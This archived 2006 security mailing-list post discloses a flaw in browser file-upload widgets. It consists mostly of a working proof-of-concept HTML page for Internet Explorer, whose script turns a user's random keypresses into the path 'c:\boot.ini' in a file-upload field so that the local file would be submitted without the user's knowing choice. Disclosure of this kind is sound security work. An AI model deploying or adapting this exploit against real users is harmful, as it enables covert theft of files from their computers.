lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Jun 8 17:27:06 2006 From: obliv at gmx.net (Bart van Arnhem) Subject: file upload widgets in IE and Firefox have issues Here is another proof of concept for IE only, it allows the characters to be entered in a arbitrary order, since it repositions the caret to make the characters drop in the right place. Just open this HTML in IE and bash on the keyboard a bit. - Bart <html> <head> <script type="text/javascript"> var targetFile = "c:\\boot.ini"; window.onload = function () { tempFilled = new Array(targetFile.length + 1).join("\x01"); tempDone = targetFile.toUpperCase(); document.getElementById("target").onkeyup = function () { this.blur(); }; document.getElementById("target").onkeypress = function (e) { if (!e) e = window.event; var pressed = String.fromCharCode(e.keyCode).toUpperCase(); if ((origPos = tempDone.indexOf(pressed)) !== -1) { tempFilled = tempFilled.substr(0, origPos) + pressed + tempFilled.substr(origPos + 1); tempDone = tempDone.replace(pressed, "\x01"); var matches = tempFilled.substr(0, origPos).match(/\x01/g); tempPos = origPos - (matches == null ? 0 : matches.length); var range = document.getElementById("target").createTextRange(); range.collapse(true); range.move("character", tempPos); range.select(); return true; } return false; } document.onkeydown = function () { document.getElementById("target").focus() }; } </script> </head> <body> <form method="post" action=""> <input type="file" id="target" /> </form> </body> </html>
Powered by blists - more mailing lists